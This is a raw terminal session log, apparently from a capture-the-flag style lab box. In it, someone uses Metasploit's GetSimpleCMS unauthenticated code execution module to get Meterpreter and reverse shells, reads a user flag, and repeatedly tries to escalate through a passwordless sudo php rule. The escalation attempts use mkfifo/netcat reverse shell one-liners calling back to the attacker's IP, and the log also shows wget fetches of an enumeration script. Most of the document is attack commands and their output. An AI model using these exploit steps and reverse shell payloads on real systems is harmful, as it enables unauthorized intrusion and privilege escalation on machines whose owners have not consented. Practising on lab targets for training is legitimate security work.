TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface
may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set RHOSTS 10.129.63.204
RHOSTS => 10.129.63.204
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set LHOST tun0LHOST => 10.10.15.44
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > check
[+] 10.129.63.204:80 - The target is vulnerable.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[-] Handler failed to bind to 10.10.15.44:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Sending stage (40004 bytes) to 10.129.63.204
[*] Meterpreter session 1 opened (10.10.15.44:4444 -> 10.129.63.204:33912) at 2025-06-24 03:35:05 -0400
id
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a back
ground thread
channel Displays information or control active
channels
close Closes a channel
detach Detach the meterpreter session (for htt
p/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post modul
e
irb Open an interactive Ruby shell on the c
urrent session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached
to the session
pry Open the Pry debugger on the current se
ssion
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post m
odule
secure (Re)Negotiate TLV packet encryption on
the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the scre
en
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias fo
r lpwd)
getwd Print working directory
lcat Read the contents of a local file to th
e screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
portfwd Forward a local port to a remote servic
e
resolve Resolve a set of host names on the targ
et
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable va
lues
getpid Get the current process identifier
getuid Get the user that the server is running
as
kill Terminate a process
localtime Displays the target system local date a
nd time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote syste
m, such as OS
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on th
e target system
For more info on a specific command, use <command> -h or help <command>.
meterpreter > exit
[*] Shutting down session: 1
[*] 10.129.63.204 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set payload 4
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Command shell session 2 opened (10.10.15.44:4444 -> 10.129.63.204:33924) at 2025-06-24 03:35:54 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@gettingstarted:/var/www/html/theme$ ls
ls
Cardinal Innovation dFJMmjuOgysIkU.php naNjathzIqT.php
www-data@gettingstarted:/var/www/html/theme$ cd
cd
bash: cd: HOME not set
www-data@gettingstarted:/var/www/html/theme$ ls
ls
Cardinal Innovation dFJMmjuOgysIkU.php naNjathzIqT.php
www-data@gettingstarted:/var/www/html/theme$ cd ..
cd ..
www-data@gettingstarted:/var/www/html$ ls
ls
LICENSE.txt backups gsconfig.php plugins robots.txt theme
admin data index.php readme.txt sitemap.xml
www-data@gettingstarted:/var/www/html$ cd ..
cd ..
www-data@gettingstarted:/var/www$ ls
ls
html
www-data@gettingstarted:/var/www$ cd ..
cd ..
www-data@gettingstarted:/var$ ls
ls
backups crash local log opt snap tmp
cache lib lock mail run spool www
www-data@gettingstarted:/var$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ cat user.txt
cat user.txt
7002d65b149b0a4d19132a66feed21d8
www-data@gettingstarted:/home/mrb3n$ wget 10.10.15.44:8000/LinEnum.sh
wget 10.10.15.44:8000/LinEnum.sh
--2025-06-24 07:38:10-- http://10.10.15.44:8000/LinEnum.sh
Connecting to 10.10.15.44:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied
Cannot write to ‘LinEnum.sh’ (Permission denied).
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ cd /usr/bin/
cd /usr/bin/
www-data@gettingstarted:/usr/bin$ ls
ls
NF nice
VGAuthService nisdomainname
'[' nl
aa-enabled nohup
aa-exec nproc
ab nroff
add-apt-repository nsenter
addpart nslookup
apport-bug nstat
apport-cli nsupdate
apport-collect ntfs-3g
apport-unpack ntfs-3g.probe
apropos ntfscat
apt ntfscluster
apt-add-repository ntfscmp
apt-cache ntfsdecrypt
apt-cdrom ntfsfallocate
apt-config ntfsfix
apt-extracttemplates ntfsinfo
apt-ftparchive ntfsls
apt-get ntfsmove
apt-key ntfsrecover
apt-mark ntfssecaudit
apt-sortpkgs ntfstruncate
arch ntfsusermap
at ntfswipe
atq numfmt
atrm od
automat-visualize3 oem-getlogs
awk on_ac_power
b2sum openssl
base32 openvt
base64 os-prober
basename pager
bash partx
bashbug passwd
batch paste
bc pastebinit
boltctl patch
bootctl pathchk
bsd-from pbget
bsd-write pbput
btrfs pbputs
btrfs-convert pdb3
btrfs-find-root pdb3.8
btrfs-image peekfd
btrfs-map-logical perl
btrfs-select-super perl5.30-x86_64-linux-gnu
btrfsck perl5.30.0
btrfstune perlbug
bunzip2 perldoc
busctl perlivp
busybox perlthanks
byobu perror
byobu-config pftp
byobu-ctrl-a pgrep
byobu-disable phar
byobu-disable-prompt phar.phar
byobu-enable phar.phar7.4
byobu-enable-prompt phar7.4
byobu-export php
byobu-janitor php7.4
byobu-keybindings pic
byobu-launch pico
byobu-launcher piconv
byobu-launcher-install pidof
byobu-launcher-uninstall pinentry
byobu-layout pinentry-curses
byobu-prompt ping
byobu-quiet ping4
byobu-reconnect-sockets ping6
byobu-screen pinky
byobu-select-backend pkaction
byobu-select-profile pkcheck
byobu-select-session pkcon
byobu-shell pkexec
byobu-silent pkill
byobu-status pkmon
byobu-status-detail pkttyagent
byobu-tmux pl2pm
byobu-ugraph pldd
byobu-ulevel plymouth
bzcat pmap
bzcmp pod2html
bzdiff pod2man
bzegrep pod2text
bzexe pod2usage
bzfgrep podchecker
bzgrep podselect
bzip2 pollinate
bzip2recover pr
bzless preconv
bzmore print
c_rehash printenv
cal printerbanner
calendar printf
captoinfo prlimit
cat prove
catchsegv prtstat
catman ps
cautious-launcher psfaddtable
cftp3 psfgettable
chage psfstriptable
chardet3 psfxtable
chardetect3 pslog
chattr pstree
chcon pstree.x11
check-language-support ptar
checkgid ptardiff
chfn ptargrep
chgrp ptx
chmod purge-old-kernels
choom pwd
chown pwdx
chrt py3clean
chsh py3compile
chvt py3versions
ckbcomp pydoc3
ckeygen3 pydoc3.8
cksum pygettext3
clear pygettext3.8
clear_console pyhtmlizer3
cmp pyjwt3
codepage python3
col python3.8
col1 rbash
col2 rcp
col3 rdma
col4 readlink
col5 realpath
col6 red
col7 rename.ul
col8 renice
col9 rescan-scsi-bus.sh
colcrt reset
colrm resizecons
column resizepart
comm resolvectl
compose rev
conch3 rgrep
corelist rlogin
cp rm
cpan rmdir
cpan5.30-x86_64-linux-gnu rnano
cpio rotatelogs
crontab routef
csplit routel
ctail rpcgen
ctstat rrsync
curl rsh
cut rsync
cvtsudoers rtstat
dash run-mailcap
date run-one
dbus-cleanup-sockets run-one-constantly
dbus-daemon run-one-until-failure
dbus-monitor run-one-until-success
dbus-run-session run-parts
dbus-send run-this-one
dbus-update-activation-environment runcon
dbus-uuidgen rview
dd rvim
deallocvt savelog
deb-systemd-helper sbattach
deb-systemd-invoke sbkeysync
debconf sbsiglist
debconf-apt-progress sbsign
debconf-communicate sbvarsign
debconf-copydb sbverify
debconf-escape scp
debconf-set-selections screen
debconf-show screendump
delpart script
delv scriptreplay
df scsi_logging_level
dfu-tool scsi_mandat
dh_bash-completion scsi_readcap
diff scsi_ready
diff3 scsi_satl
dig scsi_start
dir scsi_stop
dircolors scsi_temperature
dirmngr sdiff
dirmngr-client sed
dirname see
dmesg select-editor
dnsdomainname sensible-browser
do-release-upgrade sensible-editor
domainname sensible-pager
dpkg seq
dpkg-deb setarch
dpkg-divert setfont
dpkg-maintscript-helper setkeycodes
dpkg-query setleds
dpkg-split setlogcons
dpkg-statoverride setmetamode
dpkg-trigger setpci
du setpriv
dumpkeys setsid
ec2metadata setterm
echo setupcon
ed sftp
edit sg
editor sg_bg_ctl
egrep sg_compare_and_write
eject sg_copy_results
enc2xs sg_dd
encguess sg_decode_sense
env sg_emc_trespass
envsubst sg_format
eqn sg_get_config
ex sg_get_lba_status
expand sg_ident
expiry sg_inq
expr sg_logs
factor sg_luns
faillog sg_map
fallocate sg_map26
false sg_modes
fcgistarter sg_opcodes
fgconsole sg_persist
fgrep sg_prevent
file sg_raw
finalrd sg_rbuf
fincore sg_rdac
find sg_read
findmnt sg_read_attr
flock sg_read_block_limits
fmt sg_read_buffer
fold sg_read_long
free sg_readcap
from sg_reassign
ftp sg_referrals
funzip sg_rep_zones
fuser sg_requests
fusermount sg_reset
fwupdagent sg_reset_wp
fwupdate sg_rmsn
fwupdmgr sg_rtpg
fwupdtool sg_safte
fwupdtpmevlog sg_sanitize
gapplication sg_sat_identify
gawk sg_sat_phy_event
gdbus sg_sat_read_gplog
gencat sg_sat_set_features
geqn sg_scan
getconf sg_seek
getent sg_senddiag
getkeycodes sg_ses
getopt sg_ses_microcode
gettext sg_start
gettext.sh sg_stpg
ginstall-info sg_stream_ctl
gio sg_sync
gio-querymodules sg_test_rwbuf
git sg_timestamp
git-receive-pack sg_turs
git-shell sg_unmap
git-upload-archive sg_verify
git-upload-pack sg_vpd
glib-compile-schemas sg_wr_mode
gpasswd sg_write_buffer
gpg sg_write_long
gpg-agent sg_write_same
gpg-connect-agent sg_write_verify
gpg-wks-server sg_write_x
gpg-zip sg_xcopy
gpgcompose sg_zone
gpgconf sginfo
gpgparsemail sgm_dd
gpgsm sgp_dd
gpgsplit sh
gpgtar sha1sum
gpgv sha224sum
gpic sha256sum
grep sha384sum
gresource sha512sum
groff shasum
grog showconsolefont
grops showkey
grotty shred
groups shuf
growpart skill
grub-editenv slabtop
grub-file sleep
grub-fstest slogin
grub-glue-efi snap
grub-kbdcomp snapctl
grub-menulst2cfg snapfuse
grub-mkfont snice
grub-mkimage soelim
grub-mklayout sort
grub-mknetdir sos
grub-mkpasswd-pbkdf2 sos-collector
grub-mkrelpath sosreport
grub-mkrescue sotruss
grub-mkstandalone splain
grub-mount split
grub-ntldr-img splitfont
grub-render-label sprof
grub-script-check ss
grub-syslinux2cfg ssh
gsettings ssh-add
gtbl ssh-agent
gunzip ssh-argv0
gzexe ssh-copy-id
gzip ssh-import-id
h2ph ssh-import-id-gh
h2xs ssh-import-id-lp
hd ssh-keygen
head ssh-keyscan
helpztags stat
hexdump static-sh
host stdbuf
hostid strace
hostname strace-log-merge
hostnamectl stty
htcacheclean su
htdbm sudo
htdigest sudoedit
htop sudoreplay
htpasswd sum
hwe-support-status symcryptrun
i386 sync
ibd2sdi systemctl
iconv systemd
id systemd-analyze
info systemd-ask-password
infobrowser systemd-cat
infocmp systemd-cgls
infotocap systemd-cgtop
innochecksum systemd-delta
install systemd-detect-virt
install-info systemd-escape
instmodsh systemd-hwdb
ionice systemd-id128
ip systemd-inhibit
ipcmk systemd-machine-id-setup
ipcrm systemd-mount
ipcs systemd-notify
iptables-xml systemd-path
ischroot systemd-resolve
iscsiadm systemd-run
join systemd-socket-activate
journalctl systemd-stdio-bridge
json_pp systemd-sysusers
kbd_mode systemd-tmpfiles
kbdinfo systemd-tty-ask-password-agent
kbxutil systemd-umount
keep-one-running tabs
kernel-install tac
keyring tail
kill tar
killall taskset
kmod tbl
kmodsign tee
landscape-sysinfo telnet
last telnet.netkit
lastb tempfile
lastlog test
lcf tic
ldd time
less timedatectl
lessecho timeout
lessfile tkconch3
lesskey tload
lesspipe tmux
lexgrog toe
libnetcfg top
link touch
linux-boot-prober tput
linux-check-removal tr
linux-update-symlinks tracepath
linux-version traceroute6
linux32 traceroute6.iputils
linux64 trial3
ln troff
lnstat true
loadkeys truncate
loadunimap tset
locale tsort
locale-check tty
localectl twist3
localedef twistd3
logger tzselect
login ua
loginctl ubuntu-advantage
logname ubuntu-bug
logresolve ubuntu-core-launcher
look ubuntu-security-status
lorder ucf
lowntfs-3g ucfq
ls ucfr
lsattr udevadm
lsb_release ul
lsblk ulockmgr_server
lscpu umount
lshw uname
lsinitramfs uncompress
lsipc unexpand
lslocks unicode_start
lslogins unicode_stop
lsmem uniq
lsmod unlink
lsns unlz4
lsof unlzma
lspci unmkinitramfs
lspgpot unshare
lsusb unsquashfs
ltrace unxz
lz4 unzip
lz4c unzipsfx
lz4cat update-alternatives
lzcat update-mime-database
lzcmp uptime
lzdiff usb-devices
lzegrep usbhid-dump
lzfgrep usbreset
lzgrep users
lzless utmpdump
lzma uuidgen
lzmainfo uuidparse
lzmore vcs-run
mailmail3 vdir
man vi
man-recode view
mandb vigpg
manifest vim
manpath vim.basic
mapscrn vim.tiny
mawk vimdiff
mcookie vimtutor
md5sum vmhgfs-fuse
md5sum.textutils vmstat
mdig vmtoolsd
mesg vmware-checkvm
migrate-pubring-from-classic-gpg vmware-hgfsclient
miniterm vmware-namespace-cmd
mk_modmap vmware-rpctool
mkdir vmware-toolbox-cmd
mkfifo vmware-vgauth-cmd
mknod vmware-vgauth-smoketest
mksquashfs vmware-vmblock-fuse
mktemp vmware-xferlogs
more volname
mount w
mountpoint w.procps
mt wall
mt-gnu watch
mtr watchgnupg
mtr-packet wc
mtrace wdctl
mv wget
my_print_defaults whatis
myisam_ftdump whereis
myisamchk which
myisamlog whiptail
myisampack who
mysql whoami
mysql_config_editor wifi-status
mysql_secure_installation write
mysql_ssl_rsa_setup x86_64
mysql_tzinfo_to_sql xargs
mysql_upgrade xauth
mysqladmin xdg-user-dir
mysqlanalyze xdg-user-dirs-update
mysqlbinlog xsubpp
mysqlcheck xxd
mysqld_multi xz
mysqld_safe xzcat
mysqldump xzcmp
mysqldumpslow xzdiff
mysqlimport xzegrep
mysqloptimize xzfgrep
mysqlpump xzgrep
mysqlrepair xzless
mysqlreport xzmore
mysqlshow yes
mysqlslap ypdomainname
namei zcat
nano zcmp
nawk zdiff
nc zdump
nc.openbsd zegrep
ncal zfgrep
neqn zforce
netcat zgrep
netkit-ftp zipdetails
netstat zipgrep
networkctl zipinfo
networkd-dispatcher zless
newgrp zmore
ngettext znew
www-data@gettingstarted:/usr/bin$ cd
cd
bash: cd: HOME not set
www-data@gettingstarted:/usr/bin$ cd ..
cd ..
www-data@gettingstarted:/usr$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ sudo /usr/bin/php ^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/$
www-data@gettingstarted:/$ /usr/bin/phop
/usr/bin/phop
bash: /usr/bin/phop: No such file or directory
www-data@gettingstarted:/$ /usr/bin/php
/usr/bin/php
l
l
exit
exit
system("id);
system("id);
system("id");
system("id");
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/$
www-data@gettingstarted:/$ man /usr/bin/php
man /usr/bin/php
WARNING: terminal is not fully functional
- (press RETURN)
php(1) Scripting Language php(1)
NAME
php - PHP Command Line Interface 'CLI'
php-cgi - PHP Common Gateway Interface 'CGI' command
SYNOPSIS
php [options] [ -f ] file [[--] args...]
php [options] -r code [[--] args...]
php [options] [-B begin_code] -R code [-E end_code] [[--] args...]
php [options] [-B begin_code] -F file [-E end_code] [[--] args...]
php [options] -- [ args...]
php [options] -a
php [options] -S addr:port [-t docroot]
DESCRIPTION
Manual page php(1) line 1 (press h for help or q to quit)q
www-data@gettingstarted:/$
www-data@gettingstarted:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f" > payload.php
<h -i 2>&1|nc 10.10.14.2 9443 >/tmp/f" > payload.php
bash: payload.php: Permission denied
www-data@gettingstarted:/$ touch payload.php
touch payload.php
touch: cannot touch 'payload.php': Permission denied
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
ls
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
user.txt
www-data@gettingstarted:/home/mrb3n$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 07:42:44-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ clear
clear
TERM environment variable not set.
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ cd ..
cd ..
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home/mrb3n
cd /home/mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ /usr/bin/php -r "echo 1"
/usr/bin/php -r "echo 1"
PHP Parse error: syntax error, unexpected end of file, expecting ';' or ',' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ /usr/bin/php -r "echo 1;"
/usr/bin/php -r "echo 1;"
1www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f"^[[D^^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f"^[[D^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
</tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r 'echo function_exists("foo") ? "yes" : "no";'
<hp -r 'echo function_exists("foo") ? "yes" : "no";'
nowww-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php
sudo /usr/bin/php
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -a
sudo /usr/bin/php -a
Interactive mode enabled
No entry for terminal type "unknown";
using dumb terminal settings.
php > echo function_exists("foo") ? "yes" : "no";
echo function_exists("foo") ? "yes" : "no";
no
php > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/t
mp/f
php > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/t
mp/f
php > exit
exit
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
</tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443"
<p/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
<| /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
rm: cannot remove '/tmp/f': No such file or directory
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
<| /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
sudo -L
sudo -L
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
^C
Abort session 2? [y/N] y
[*] 10.129.63.204 - Command shell session 2 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Command shell session 3 opened (10.10.15.44:4444 -> 10.129.63.204:34270) at 2025-06-24 04:04:32 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@gettingstarted:/var/www/html/theme$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo l
sudo l
[sudo] password for www-data: sudo -l
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ wget wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 08:11:41-- http://wget/
Resolving wget (wget)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘wget’
--2025-06-24 08:11:41-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘raw.githubusercontent.com’
www-data@gettingstarted:/home/mrb3n$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 08:11:56-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘raw.githubusercontent.com’
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
kali
kali
id
id
ls
ls
ssh: connect to host 10.10.15.44 port 22: Connection timed out
www-data@gettingstarted:/home/mrb3n$ kali
Command 'kali' not found, but can be installed with:
apt install kali
Please ask your administrator.
www-data@gettingstarted:/home/mrb3n$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
